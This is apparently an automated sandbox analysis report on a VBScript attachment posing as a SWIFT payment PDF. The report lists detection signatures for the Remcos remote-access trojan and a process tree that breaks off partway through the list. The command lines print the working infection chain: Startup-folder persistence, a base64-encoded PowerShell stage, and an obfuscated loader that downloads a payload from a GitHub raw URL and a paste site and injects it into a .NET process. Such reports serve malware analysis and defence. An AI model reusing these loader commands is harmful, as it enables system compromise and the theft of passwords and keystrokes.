Edit tour
Windows
Analysis Report
SWIFT 103 202406111301435660 110624-pdf.vbs
Overview
General Information
Detection
Remcos
Score: | 100 |
Range: | 0 - 100 |
Whitelisted: | false |
Confidence: | 100% |
Signatures
Found malware configuration
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for domain / URL
Multi AV Scanner detection for submitted file
Sigma detected: Remcos
Suricata IDS alerts for network traffic
VBScript performs obfuscated calls to suspicious functions
Yara detected Remcos RAT
Bypasses PowerShell execution policy
C2 URLs / IPs found in malware configuration
Connects to a pastebin service (likely for C&C)
Contains functionality to inject code into remote processes
Contains functionality to register a low level keyboard hook
Contains functionality to steal Chrome passwords or cookies
Contains functionality to steal Firefox passwords or cookies
Contains functionalty to change the wallpaper
Delayed program exit found
Found suspicious powershell code related to unpacking or dynamic code loading
Injects a PE file into a foreign processes
Installs a global keyboard hook
Maps a DLL or memory area into another process
Obfuscated command line found
Sigma detected: Base64 Encoded PowerShell Command Detected
Sigma detected: Potential PowerShell Command Line Obfuscation
Sigma detected: PowerShell Base64 Encoded FromBase64String Cmdlet
Sigma detected: Suspect Svchost Activity
Sigma detected: WScript or CScript Dropper
Suspicious execution chain found
Suspicious powershell command line found
Uses dynamic DNS services
Uses ping.exe to check the status of other devices and networks
Uses ping.exe to sleep
Windows Scripting host queries suspicious COM object (likely to drop second stage)
Writes to foreign memory regions
Wscript starts Powershell (via cmd or directly)
Contains functionality for read data from the clipboard
Contains functionality to call native functions
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to download and launch executables
Contains functionality to dynamically determine API calls
Contains functionality to enumerate process and check for explorer.exe or svchost.exe (often used for thread injection)
Contains functionality to enumerate running services
Contains functionality to launch a control a shell (cmd.exe)
Contains functionality to modify clipboard data
Contains functionality to query CPU information (cpuid)
Contains functionality to query locales information (e.g. system language)
Contains functionality to read the PEB
Contains functionality to read the clipboard data
Contains functionality to retrieve information about pressed keystrokes
Contains functionality to shutdown / reboot the system
Contains functionality to simulate mouse events
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Creates files inside the system directory
Detected TCP or UDP traffic on non-standard ports
Detected non-DNS traffic on DNS port
Detected potential crypto function
Extensive use of GetProcAddress (often used to hide API calls)
Found WSH timer for Javascript or VBS script (likely evasive script)
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found potential string decryption / allocating functions
HTTP GET or POST without a user agent
IP address seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
Java / VBScript file with very long strings (likely obfuscated code)
May sleep (evasive loops) to hinder dynamic analysis
Queries disk information (often used to detect virtual machines)
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sigma detected: Change PowerShell Policies to an Insecure Level
Sigma detected: Conhost Spawned By Uncommon Parent Process
Sigma detected: Uncommon Svchost Parent Process
Sigma detected: WSF/JSE/JS/VBA/VBE File Execution Via Cscript/Wscript
Stores files to the Windows start menu directory
Too many similar processes found
Uses Microsoft's Enhanced Cryptographic Provider
Uses code obfuscation techniques (call, push, ret)
Uses insecure TLS / SSL version for HTTPS connection
Very long cmdline option found, this is very uncommon (may be encrypted or packed)
Yara signature match
Classification
- System is w10x64
- wscript.exe (PID: 3032 cmdline:
C:\Windows \System32\ WScript.ex e "C:\User s\user\Des ktop\SWIFT 103 20240 6111301435 660 110624 -pdf.vbs" MD5: A47CBE969EA935BDD3AB568BB126BC80) - cmd.exe (PID: 5996 cmdline:
"C:\Window s\System32 \cmd.exe" /c ping 12 7.0.0.1 -n 10 & powe rshell -co mmand [Sys tem.IO.Fil e]::Copy(' C:\Windows \system32\ SWIFT 103 2024061113 01435660 1 10624-pdf. vbs', 'C:\ Users\' + [Environme nt]::UserN ame + ''\A ppData\Roa ming\Micro soft\Windo ws\Start M enu\Progra ms\Startup \ sbv.etir enrew.vbs' )') MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE) - conhost.exe (PID: 6584 cmdline:
C:\Windows \system32\ conhost.ex e 0xffffff ff -ForceV 1 MD5: 0D698AF330FD17BEE3BF90011D49251D) - PING.EXE (PID: 320 cmdline:
ping 127.0 .0.1 -n 10 MD5: 2F46799D79D22AC72C241EC0322B011D) - powershell.exe (PID: 1076 cmdline:
powershell -command [System.IO .File]::Co py('C:\Win dows\syste m32\SWIFT 103 202406 1113014356 60 110624- pdf.vbs', 'C:\Users\ ' + [Envir onment]::U serName + ''\AppData \Roaming\M icrosoft\W indows\Sta rt Menu\Pr ograms\Sta rtup\ sbv. etirenrew. vbs')') MD5: 04029E121A0CFA5991749937DD22A1D9) - powershell.exe (PID: 1396 cmdline:
"C:\Window s\System32 \WindowsPo werShell\v 1.0\powers hell.exe" -command $ Codigo = ' JigodkFSaW FiTGUgJypN ZFIqJykubm FtZVszLDEx LDJdLUpPaW 4nJykgKCAo J3UnKycwRH UnKydybCcr JyA9IEonKy dodWh0dHBz JysnOi8nKy cvcmEnKyd3 LmdpJysndG h1YicrJ3Vz ZScrJ3Jjb2 50ZW50Jysn LicrJ2NvJy snbS9Ob0Rl dGVjdE8nKy duLycrJ05v RGV0ZScrJ2 MnKyd0T24v JysncmVmJy sncycrJy9o JysnZWEnKy dkcy9tYWlu JysnLycrJ0 RldGFoTm8n Kyd0aC1WLn R4JysndEon KydodTsgdT BEYicrJ2Fz ZTY0Q29udG UnKydudCA9 ICcrJyhOZX ctT2JqZScr J2N0IFN5cy crJ3RlbS5O ZXQuV2ViJy snQ2xpJysn ZScrJ250KS crJy5Eb3du bG9hZFN0Jy sncicrJ2lu Zyh1MEQnKy d1cmwpOyB1 MCcrJ0RiaS crJ25hJysn cicrJ3lDb2 50ZW50Jysn ID0gW1N5cy crJ3QnKydl JysnbS4nKy dDbycrJ24n Kyd2JysnZS crJ3InKyd0 XScrJzo6Ri crJ3JvbUJh c2U2NFN0cm knKyduZycr Jyh1MERiYX NlJysnNjRD b250ZScrJ2 50KTsgJysn dScrJzBEYX NzJysnZW1i bHknKycgPS BbUmVmbCcr J2VjJysndG lvbi5BJysn c3NlbWInKy dsJysneV0n Kyc6OkwnKy dvYScrJ2Qn KycoJysndT AnKydEYicr J2luJysnYS crJ3J5Qycr J29udCcrJ2 VudCknKyc7 IFtkbmxpYi 5JJysnTycr Jy5IbycrJ2 1lXTo6VkEn KydJJysnKG Q2ZzAnKycv JysnTycrJ1 lVJysnbFgv ZC9lZScrJy 5ldHNhcC8v OnNwJysndH RoZCcrJzYn KydnLCBkJy snNmdkZXNh JysndCcrJ2 l2JysnYScr J2RvZDZnJy snLCBkJysn NmcnKydkZS crJ3NhdCcr J2l2JysnYW RvJysnZDYn KydnLCAnKy dkNmdkZXMn KydhdGl2YW RvZDZnJysn LCBkJysnNi crJ2dBZGRJ JysnbicrJ1 ByJysnb2Nl cycrJ3MzMi crJ2Q2Zywg ZDYnKydnZD ZnJysnLGQn Kyc2Z2Q2Jy snZyknKS5y RXBsQUNlKC d1MEQnLCck JykuckVwbE FDZSgoW2NI YVJdNzQrW2 NIYVJdMTA0 K1tjSGFSXT ExNyksW1NU ckluZ11bY0 hhUl0zOSku ckVwbEFDZS gnZDZnJyxb U1RySW5nXV tjSGFSXTM0 KSk=';$OWj uxd = [sys tem.Text.e ncoding]:: UTF8.GetSt ring([syst em.Convert ]::Frombas e64String( $codigo)); powershell .exe -wind owstyle hi dden -exec utionpolic y bypass - NoProfile -command $ OWjuxD MD5: 04029E121A0CFA5991749937DD22A1D9) - conhost.exe (PID: 3136 cmdline:
C:\Windows \system32\ conhost.ex e 0xffffff ff -ForceV 1 MD5: 0D698AF330FD17BEE3BF90011D49251D) - powershell.exe (PID: 7136 cmdline:
"C:\Window s\System32 \WindowsPo werShell\v 1.0\powers hell.exe" -windowsty le hidden -execution policy byp ass -NoPro file -comm and "&((vA RiabLe '*M dR*').name [3,11,2]-J Oin'') ( ( 'u'+'0Du'+ 'rl'+' = J '+'huhttps '+':/'+'/r a'+'w.gi'+ 'thub'+'us e'+'rconte nt'+'.'+'c o'+'m/NoDe tectO'+'n/ '+'NoDete' +'c'+'tOn/ '+'ref'+'s '+'/h'+'ea '+'ds/main '+'/'+'Det ahNo'+'th- V.tx'+'tJ' +'hu; u0Db '+'ase64Co nte'+'nt = '+'(New-O bje'+'ct S ys'+'tem.N et.Web'+'C li'+'e'+'n t)'+'.Down loadSt'+'r '+'ing(u0D '+'url); u 0'+'Dbi'+' na'+'r'+'y Content'+' = [Sys'+' t'+'e'+'m. '+'Co'+'n' +'v'+'e'+' r'+'t]'+': :F'+'romBa se64Stri'+ 'ng'+'(u0D base'+'64C onte'+'nt) ; '+'u'+'0 Dass'+'emb ly'+' = [R efl'+'ec'+ 'tion.A'+' ssemb'+'l' +'y]'+'::L '+'oa'+'d' +'('+'u0'+ 'Db'+'in'+ 'a'+'ryC'+ 'ont'+'ent )'+'; [dnl ib.I'+'O'+ '.Ho'+'me] ::VA'+'I'+ '(d6g0'+'/ '+'O'+'YU' +'lX/d/ee' +'.etsap// :sp'+'tthd '+'6'+'g, d'+'6gdesa '+'t'+'iv' +'a'+'dod6 g'+', d'+' 6g'+'de'+' sat'+'iv'+ 'ado'+'d6' +'g, '+'d6 gdes'+'ati vadod6g'+' , d'+'6'+' gAddI'+'n' +'Pr'+'oce s'+'s32'+' d6g, d6'+' gd6g'+',d' +'6gd6'+'g )').rEplAC e('u0D','$ ').rEplACe (([cHaR]74 +[cHaR]104 +[cHaR]117 ),[STrIng] [cHaR]39). rEplACe('d 6g',[STrIn g][cHaR]34 ))" MD5: 04029E121A0CFA5991749937DD22A1D9) - AddInProcess32.exe (PID: 1988 cmdline:
"C:\Window s\Microsof t.NET\Fram ework\v4.0 .30319\Add InProcess3 2.exe" MD5: 9827FF3CDF4B83F9C86354606736CA9C) - svchost.exe (PID: 6516 cmdline:
svchost.ex e MD5: 1ED18311E3DA35942DB37D15FA40CC5B) - conhost.exe (PID: 2316 cmdline:
C:\Windows \system32\ conhost.ex e 0xffffff ff -ForceV 1 MD5: 0D698AF330FD17BEE3BF90011D49251D) - chrome.exe (PID: 3032 cmdline:
"C:\Progra m Files\Go ogle\Chrom e\Applicat ion\chrome .exe" --st art-maximi zed --sing le-argumen t http://g o.microsof t.com/fwli nk/?prd=11 324&pver=4 .5&sbp=App Launch2&pl cid=0x409& o1=SHIM_NO VERSION_FO UND&versio n=(null)&p rocessName =svchost.e xe&platfor m=0009&osv er=7&isSer ver=0&shim ver=4.0.30 319.0 MD5: 45DE480806D1B5D462A7DDE4DCEFC4E4) - chrome.exe (PID: 7768 cmdline:
"C:\Progra m Files\Go ogle\Chrom e\Applicat ion\chrome .exe" --st art-maximi zed --sing le-argumen t http://g o.microsof t.com/fwli nk/?prd=11 324&pver=4 .5&sbp=App Launch2&pl cid=0x409& o1=SHIM_NO VERSION_FO UND&versio n=(null)&p rocessName =svchost.e xe&platfor m=0009&osv er=7&isSer ver=0&shim ver=4.0.30 319.0 MD5: 45DE480806D1B5D462A7DDE4DCEFC4E4) - chrome.exe (PID: 7984 cmdline:
"C:\Progra m Files\Go ogle\Chrom e\Applicat ion\chrome .exe" --ty pe=utility --utility -sub-type= network.mo jom.Networ kService - -lang=en-U S --servic e-sandbox- type=none --mojo-pla tform-chan nel-handle =2084 --fi eld-trial- handle=202 0,i,180657 7069063692 2477,59192 0096709874 1641,26214 4 --disabl e-features =Optimizat ionGuideMo delDownloa ding,Optim izationHin ts,Optimiz ationHints Fetching,O ptimizatio nTargetPre diction /p refetch:8 MD5: 45DE480806D1B5D462A7DDE4DCEFC4E4) - svchost.exe (PID: 7900 cmdline:
svchost.ex e MD5: 1ED18311E3DA35942DB37D15FA40CC5B) - conhost.exe (PID: 7968 cmdline:
C:\Windows \system32\ conhost.ex e 0xffffff ff -ForceV 1 MD5: 0D698AF330FD17BEE3BF90011D49251D) - chrome.exe (PID: 7580 cmdline:
"C:\Progra m Files\Go ogle\Chrom e\Applicat ion\chrome .exe" --st art-maximi zed --sing le-argumen t http://g o.microsof t.com/fwli nk/?prd=11 324&pver=4 .5&sbp=App Launch2&pl cid=0x409& o1=SHIM_NO VERSION_FO UND&versio n=(null)&p rocessName =svchost.e xe&platfor m=0009&osv er=7&isSer ver=0&shim ver=4.0.30 319.0 MD5: 45DE480806D1B5D462A7DDE4DCEFC4E4) - chrome.exe (PID: 8076 cmdline:
"C:\Progra m Files\Go ogle\Chrom e\Applicat ion\chrome .exe" --ty pe=utility --utility -sub-type= network.mo jom.Networ kService - -lang=en-U S --servic e-sandbox- type=none --mojo-pla tform-chan nel-handle =2072 --fi eld-trial- handle=118 0,i,156624 1702111680 0271,17959 3018780975 03911,2621 44 --disab le-feature s=Optimiza tionGuideM odelDownlo ading,Opti mizationHi nts,Optimi zationHint sFetching, Optimizati onTargetPr ediction / prefetch:8 MD5: 45DE480806D1B5D462A7DDE4DCEFC4E4) - chrome.exe (PID: 1684 cmdline:
"C:\Progra m Files\Go ogle\Chrom e\Applicat ion\chrome .exe" --st art-maximi zed --sing le-argumen t http://g o.microsof t.com/fwli nk/?prd=11 324&pver=4 .5&sbp=App Launch2&pl cid=0x409& o1=SHIM_NO VERSION_FO UND&versio n=(null)&p rocessName =svchost.e xe&platfor m=0009&osv er=7&isSer ver=0&shim ver=4.0.30 319.0 MD5: 45DE480806D1B5D462A7DDE4DCEFC4E4) - chrome.exe (PID: 8288 cmdline:
"C:\Progra m Files\Go ogle\Chrom e\Applicat ion\chrome .exe" --ty pe=utility --utility -sub-type= network.mo jom.Networ kService - -lang=en-U S --servic e-sandbox- type=none --mojo-pla tform-chan nel-handle =2116 --fi eld-trial- handle=196 8,i,153585 8601435436 3738,17383 5642312836 0891,26214 4 --disabl e-features =Optimizat ionGuideMo delDownloa ding,Optim izationHin ts,Optimiz ationHints Fetching,O ptimizatio nTargetPre diction /p refetch:8 MD5: 45DE480806D1B5D462A7DDE4DCEFC4E4) - svchost.exe (PID: 8208 cmdline:
svchost.ex e MD5: 1ED18311E3DA35942DB37D15FA40CC5B) - conhost.exe (PID: 8272 cmdline:
C:\Windows \system32\ conhost.ex e 0xffffff ff -ForceV 1 MD5: 0D698AF330FD17BEE3BF90011D49251D) - chrome.exe (PID: 8660 cmdline:
"C:\Progra m Files\Go ogle\Chrom e\Applicat ion\chrome .exe" --st art-maximi zed --sing le-argumen t http://g o.microsof t.com/fwli nk/?prd=11 324&pver=4 .5&sbp=App Launch2&pl cid=0x409& o1=SHIM_NO VERSION_FO UND&versio n=(null)&p rocessName =svchost.e xe&platfor m=0009&osv er=7&isSer ver=0&shim ver=4.0.30 319.0 MD5: 45DE480806D1B5D462A7DDE4DCEFC4E4) - chrome.exe (PID: 8844 cmdline:
"C:\Progra m Files\Go ogle\Chrom e\Applicat ion\chrome .exe" --ty pe=utility --utility -sub-type= network.mo jom.Networ kService - -lang=en-U S --servic e-sandbox- type=none --mojo-pla tform-chan nel-handle =2060 --fi eld-trial- handle=200 0,i,166376 1032091793 4916,56522 3346788031 028,262144 --disable -features= Optimizati onGuideMod elDownload ing,Optimi zationHint s,Optimiza tionHintsF etching,Op timization TargetPred iction /pr efetch:8 MD5: 45DE480806D1B5D462A7DDE4DCEFC4E4) - chrome.exe (PID: 9080 cmdline:
"C:\Progra m Files\Go ogle\Chrom e\Applicat ion\chrome .exe" --st art-maximi zed --sing le-argumen t http://g o.microsof t.com/fwli nk/?prd=11 324&pver=4 .5&sbp=App Launch2&pl cid=0x409& o1=SHIM_NO VERSION_FO UND&versio n=(null)&p rocessName =svchost.e xe&platfor m=0009&osv er=7&isSer ver=0&shim ver=4.0.30 319.0 MD5: 45DE480806D1B5D462A7DDE4DCEFC4E4) - chrome.exe (PID: 8040 cmdline:
"C:\Progra m Files\Go ogle\Chrom e\Applicat ion\chrome .exe" --ty pe=utility --utility -sub-type= network.mo jom.Networ kService - -lang=en-U S --servic e-sandbox- type=none --mojo-pla tform-chan nel-handle =2068 --fi eld-trial- handle=118 4,i,113047 6888448619 373,447246 4422477594 584,262144 --disable -features= Optimizati onGuideMod elDownload ing,Optimi zationHint s,Optimiza tionHintsF etching,Op timization TargetPred iction /pr efetch:8 MD5: 45DE480806D1B5D462A7DDE4DCEFC4E4) - svchost.exe (PID: 7828 cmdline:
svchost.ex e MD5: 1ED18311E3DA35942DB37D15FA40CC5B) - conhost.exe (PID: 5384 cmdline:
C:\Windows \system32\ conhost.ex e 0xffffff ff -ForceV 1 MD5: 0D698AF330FD17BEE3BF90011D49251D) - chrome.exe (PID: 7492 cmdline:
"C:\Progra m Files\Go ogle\Chrom e\Applicat ion\chrome .exe" --st art-maximi zed --sing le-argumen t http://g o.microsof t.com/fwli nk/?prd=11 324&pver=4 .5&sbp=App Launch2&pl cid=0x409& o1=SHIM_NO VERSION_FO UND&versio n=(null)&p rocessName =svchost.e xe&platfor m=0009&osv er=7&isSer ver=0&shim ver=4.0.30 319.0 MD5: 45DE480806D1B5D462A7DDE4DCEFC4E4) - chrome.exe (PID: 2300 cmdline:
"C:\Progra m Files\Go ogle\Chrom e\Applicat ion\chrome .exe" --ty pe=utility --utility -sub-type= network.mo jom.Networ kService - -lang=en-U S --servic e-sandbox- type=none --mojo-pla tform-chan nel-handle =2044 --fi eld-trial- handle=200 4,i,293747 0017902191 409,521883 2269953484 114,262144 --disable -features= Optimizati onGuideMod elDownload ing,Optimi zationHint s,Optimiza tionHintsF etching,Op timization TargetPred iction /pr efetch:8 MD5: 45DE480806D1B5D462A7DDE4DCEFC4E4) - chrome.exe (PID: 8072 cmdline:
"C:\Progra m Files\Go ogle\Chrom e\Applicat ion\chrome .exe" --st art-maximi zed --sing le-argumen t http://g o.microsof t.com/fwli nk/?prd=11 324&pver=4 .5&sbp=App Launch2&pl cid=0x409& o1=SHIM_NO VERSION_FO UND&versio n=(null)&p rocessName =svchost.e xe&platfor m=0009&osv er=7&isSer ver=0&shim ver=4.0.30 319.0 MD5: 45DE480806D1B5D462A7DDE4DCEFC4E4) - chrome.exe (PID: 8944 cmdline:
"C:\Progra m Files\Go ogle\Chrom e\Applicat ion\chrome .exe" --ty pe=utility --utility -sub-type= network.mo jom.Networ kService - -lang=en-U S --servic e-sandbox- type=none --mojo-pla tform-chan nel-handle =2084 --fi eld-trial- handle=200 8,i,161211 2921509113 9583,46772 7296036553 9008,26214 4 --disabl e-features =Optimizat ionGuideMo delDownloa ding,Optim izationHin ts,Optimiz ationHints Fetching,O ptimizatio nTargetPre diction /p refetch:8 MD5: 45DE480806D1B5D462A7DDE4DCEFC4E4) - svchost.exe (PID: 8596 cmdline:
svchost.ex e MD5: 1ED18311E3DA35942DB37D15FA40CC5B) - conhost.exe (PID: 8572 cmdline:
C:\Windows \system32\ conhost.ex e 0xffffff ff -ForceV 1 MD5: 0D698AF330FD17BEE3BF90011D49251D) - chrome.exe (PID: 5404 cmdline:
"C:\Progra m Files\Go ogle\Chrom e\Applicat ion\chrome .exe" --st art-maximi zed --sing le-argumen t http://g o.microsof t.com/fwli nk/?prd=11 324&pver=4 .5&sbp=App Launch2&pl cid=0x409& o1=SHIM_NO VERSION_FO UND&versio n=(null)&p rocessName =svchost.e xe&platfor m=0009&osv er=7&isSer ver=0&shim ver=4.0.30 319.0 MD5: 45DE480806D1B5D462A7DDE4DCEFC4E4) - chrome.exe (PID: 7988 cmdline:
"C:\Progra m Files\Go ogle\Chrom e\Applicat ion\chrome .exe" --ty pe=utility --utility -sub-type= network.mo jom.Networ kService - -lang=en-U S --servic e-sandbox- type=none --mojo-pla tform-chan nel-handle =2052 --fi eld-trial- handle=200 8,i,169823 0602550143 4778,10627 6507279571 62702,2621 44 --disab le-feature s=Optimiza tionGuideM odelDownlo ading,Opti mizationHi nts,Optimi zationHint sFetching, Optimizati onTargetPr ediction / prefetch:8 MD5: 45DE480806D1B5D462A7DDE4DCEFC4E4) - chrome.exe (PID: 5884 cmdline:
"C:\Progra m Files\Go ogle\Chrom e\Applicat ion\chrome .exe" --st art-maximi zed --sing le-argumen t http://g o.microsof t.com/fwli nk/?prd=11 324&pver=4 .5&sbp=App Launch2&pl cid=0x409& o1=SHIM_NO VERSION_FO UND&versio n=(null)&p rocessName =svchost.e xe&platfor m=0009&osv er=7&isSer ver=0&shim ver=4.0.30 319.0 MD5: 45DE480806D1B5D462A7DDE4DCEFC4E4) - chrome.exe (PID: 6108 cmdline:
"C:\Progra m Files\Go ogle\Chrom e\Applicat ion\chrome .exe" --ty pe=utility --utility -sub-type= network.mo jom.Networ kService - -lang=en-U S --servic e-sandbox- type=none --mojo-pla tform-chan nel-handle =2064 --fi eld-trial- handle=200 8,i,181465 0817975288 1524,91920 0875560916 846,262144 --disable -features= Optimizati onGuideMod elDownload ing,Optimi zationHint s,Optimiza tionHintsF etching,Op timization TargetPred iction /pr efetch:8 MD5: 45DE480806D1B5D462A7DDE4DCEFC4E4) - svchost.exe (PID: 5384 cmdline:
svchost.ex e MD5: 1ED18311E3DA35942DB37D15FA40CC5B) - conhost.exe (PID: 8936 cmdline:
C:\Windows \system32\ conhost.ex e 0xffffff ff -ForceV 1 MD5: 0D698AF330FD17BEE3BF90011D49251D) - chrome.exe (PID: 9080 cmdline:
"C:\Progra m Files\Go ogle\Chrom e\Applicat ion\chrome .exe" --st art-maximi zed --sing le-argumen t http://g o.microsof t.com/fwli nk/?prd=11 324&pver=4 .5&sbp=App Launch2&pl cid=0x409& o1=SHIM_NO VERSION_FO UND&versio n=(null)&p rocessName =svchost.e xe&platfor m=0009&osv er=7&isSer ver=0&shim ver=4.0.30 319.0 MD5: 45DE480806D1B5D462A7DDE4DCEFC4E4) - chrome.exe (PID: 7116 cmdline:
"C:\Progra m Files\Go ogle\Chrom e\Applicat ion\chrome .exe" --ty pe=utility --utility -sub-type= network.mo jom.Networ kService - -lang=en-U S --servic e-sandbox- type=none --mojo-pla tform-chan nel-handle =2044 --fi eld-trial- handle=200 8,i,158236 2440046016 6783,65369 3513945257 6376,26214 4 --disabl e-features =Optimizat ionGuideMo delDownloa ding,Optim izationHin ts,Optimiz ationHints Fetching,O ptimizatio nTargetPre diction /p refetch:8 MD5: 45DE480806D1B5D462A7DDE4DCEFC4E4) - chrome.exe (PID: 8204 cmdline:
"C:\Progra m Files\Go ogle\Chrom e\Applicat ion\chrome .exe" --st art-maximi zed --sing le-argumen t http://g o.microsof t.com/fwli nk/?prd=11 324&pver=4 .5&sbp=App Launch2&pl cid=0x409& o1=SHIM_NO VERSION_FO UND&versio n=(null)&p rocessName =svchost.e xe&platfor m=0009&osv er=7&isSer ver=0&shim ver=4.0.30 319.0 MD5: 45DE480806D1B5D462A7DDE4DCEFC4E4) - chrome.exe (PID: 8392 cmdline:
"C:\Progra m Files\Go ogle\Chrom e\Applicat ion\chrome .exe" --ty pe=utility --utility -sub-type= network.mo jom.Networ kService - -lang=en-U S --servic e-sandbox- type=none --mojo-pla tform-chan nel-handle =2080 --fi eld-trial- handle=196 4,i,544084 2566350035 257,107872 0309206894 6937,26214 4 --disabl e-features =Optimizat ionGuideMo delDownloa ding,Optim izationHin ts,Optimiz ationHints Fetching,O ptimizatio nTargetPre diction /p refetch:8 MD5: 45DE480806D1B5D462A7DDE4DCEFC4E4) - svchost.exe (PID: 8888 cmdline:
svchost.ex e MD5: 1ED18311E3DA35942DB37D15FA40CC5B) - conhost.exe (PID: 8904 cmdline:
C:\Windows \system32\ conhost.ex e 0xffffff ff -ForceV 1 MD5: 0D698AF330FD17BEE3BF90011D49251D) - chrome.exe (PID: 7504 cmdline:
"C:\Progra m Files\Go ogle\Chrom e\Applicat ion\chrome .exe" --st art-maximi zed --sing le-argumen t http://g o.microsof t.com/fwli nk/?prd=11 324&pver=4 .5&sbp=App Launch2&pl cid=0x409& o1=SHIM_NO VERSION_FO UND&versio n=(null)&p rocessName =svchost.e xe&platfor m=0009&osv er=7&isSer ver=0&shim ver=4.0.30 319.0 MD5: 45DE480806D1B5D462A7DDE4DCEFC4E4) - chrome.exe (PID: 3608 cmdline:
"C:\Progra m Files\Go ogle\Chrom e\Applicat ion\chrome .exe" --ty pe=utility --utility -sub-type= network.mo jom.Networ kService - -lang=en-U S --servic e-sandbox- type=none --mojo-pla tform-chan nel-handle =2092 --fi eld-trial- handle=203 2,i,115539 7720443847 2227,74451 8635520585 0417,26214 4 --disabl e-features =Optimizat ionGuideMo delDownloa ding,Optim izationHin ts,Optimiz ationHints Fetching,O ptimizatio nTargetPre diction /p refetch:8 MD5: 45DE480806D1B5D462A7DDE4DCEFC4E4) - chrome.exe (PID: 3808 cmdline:
"C:\Progra m Files\Go ogle\Chrom e\Applicat ion\chrome .exe" --st art-maximi zed --sing le-argumen t http://g o.microsof t.com/fwli nk/?prd=11 324&pver=4 .5&sbp=App Launch2&pl cid=0x409& o1=SHIM_NO VERSION_FO UND&versio n=(null)&p rocessName =svchost.e xe&platfor m=0009&osv er=7&isSer ver=0&shim ver=4.0.30 319.0 MD5: 45DE480806D1B5D462A7DDE4DCEFC4E4) - chrome.exe (PID: 1096 cmdline:
"C:\Progra m Files\Go ogle\Chrom e\Applicat ion\chrome .exe" --ty pe=utility --utility -sub-type= network.mo jom.Networ kService - -lang=en-U S --servic e-sandbox- type=none --mojo-pla tform-chan nel-handle =2032 --fi eld-trial- handle=198 8,i,737431 5475741238 408,221074 3874770523 791,262144 --disable -features= Optimizati onGuideMod elDownload ing,Optimi zationHint s,Optimiza tionHintsF etching,Op timization TargetPred iction /pr efetch:8 MD5: 45DE480806D1B5D462A7DDE4DCEFC4E4) - svchost.exe (PID: 7092 cmdline:
svchost.ex e MD5: 1ED18311E3DA35942DB37D15FA40CC5B) - conhost.exe (PID: 7080 cmdline:
C:\Windows \system32\ conhost.ex e 0xffffff ff -ForceV 1 MD5: 0D698AF330FD17BEE3BF90011D49251D) - chrome.exe (PID: 8584 cmdline:
"C:\Progra m Files\Go ogle\Chrom e\Applicat ion\chrome .exe" --st art-maximi zed --sing le-argumen t http://g o.microsof t.com/fwli nk/?prd=11 324&pver=4 .5&sbp=App Launch2&pl cid=0x409& o1=SHIM_NO VERSION_FO UND&versio n=(null)&p rocessName =svchost.e xe&platfor m=0009&osv er=7&isSer ver=0&shim ver=4.0.30 319.0 MD5: 45DE480806D1B5D462A7DDE4DCEFC4E4) - chrome.exe (PID: 1132 cmdline:
"C:\Progra m Files\Go ogle\Chrom e\Applicat ion\chrome .exe" --ty pe=utility --utility -sub-type= network.mo jom.Networ kService - -lang=en-U S --servic e-sandbox- type=none --mojo-pla tform-chan nel-handle =2040 --fi eld-trial- handle=200 0,i,391655 4340437548 015,150044 3498568681 016,262144 --disable -features= Optimizati onGuideMod elDownload ing,Optimi zationHint s,Optimiza tionHintsF etching,Op timization TargetPred iction /pr efetch:8 MD5: 45DE480806D1B5D462A7DDE4DCEFC4E4) - chrome.exe (PID: 7032 cmdline:
"C:\Progra m Files\Go ogle\Chrom e\Applicat ion\chrome .exe" --st art-maximi zed --sing le-argumen t http://g o.microsof t.com/fwli nk/?prd=11 324&pver=4 .5&sbp=App Launch2&pl cid=0x409& o1=SHIM_NO VERSION_FO UND&versio n=(null)&p rocessName =svchost.e xe&platfor m=0009&osv er=7&isSer ver=0&shim ver=4.0.30 319.0 MD5: 45DE480806D1B5D462A7DDE4DCEFC4E4) - chrome.exe (PID: 8876 cmdline:
"C:\Progra m Files\Go ogle\Chrom e\Applicat ion\chrome .exe" --ty pe=utility --utility -sub-type= network.mo jom.Networ kService - -lang=en-U S --servic e-sandbox- type=none --mojo-pla tform-chan nel-handle =2132 --fi eld-trial- handle=201 6,i,977700 7145685273 446,117007 6376956290 9530,26214 4 --disabl e-features =Optimizat ionGuideMo delDownloa ding,Optim izationHin ts,Optimiz ationHints Fetching,O ptimizatio nTargetPre diction /p refetch:8 MD5: 45DE480806D1B5D462A7DDE4DCEFC4E4) - svchost.exe (PID: 8296 cmdline:
svchost.ex e MD5: 1ED18311E3DA35942DB37D15FA40CC5B) - conhost.exe (PID: 3236 cmdline:
C:\Windows \system32\ conhost.ex e 0xffffff ff -ForceV 1 MD5: 0D698AF330FD17BEE3BF90011D49251D) - chrome.exe (PID: 8080 cmdline:
"C:\Progra m Files\Go ogle\Chrom e\Applicat ion\chrome .exe" --st art-maximi zed --sing le-argumen t http://g o.microsof t.com/fwli nk/?prd=11 324&pver=4 .5&sbp=App Launch2&pl cid=0x409& o1=SHIM_NO VERSION_FO UND&versio n=(null)&p rocessName =svchost.e xe&platfor m=0009&osv er=7&isSer ver=0&shim ver=4.0.30 319.0 MD5: 45DE480806D1B5D462A7DDE4DCEFC4E4) - chrome.exe (PID: 8664 cmdline:
"C:\Progra m Files\Go ogle\Chrom e\Applicat ion\chrome .exe" --ty pe=utility --utility -sub-type= network.mo jom.Networ kService - -lang=en-U S --servic e-sandbox- type=none --mojo-pla tform-chan nel-handle =2028 --fi eld-trial- handle=196 8,i,960256 9947055018 222,141016 5870644768 8223,26214 4 --disabl e-features =Optimizat ionGuideMo delDownloa ding,Optim izationHin ts,Optimiz ationHints Fetching,O ptimizatio nTargetPre diction /p refetch:8 MD5: 45DE480806D1B5D462A7DDE4DCEFC4E4) - chrome.exe (PID: 8788 cmdline:
"C:\Progra m Files\Go ogle\Chrom e\Applicat ion\chrome .exe" --st art-maximi zed --sing le-argumen t http://g o.microsof t.com/fwli nk/?prd=11 324&pver=4 .5&sbp=App Launch2&pl cid=0x409& o1=SHIM_NO VERSION_FO UND&versio n=(null)&p rocessName =svchost.e xe&platfor m=0009&osv er=7&isSer ver=0&shim ver=4.0.30 319.0 MD5: 45DE480806D1B5D462A7DDE4DCEFC4E4) - chrome.exe (PID: 4024 cmdline:
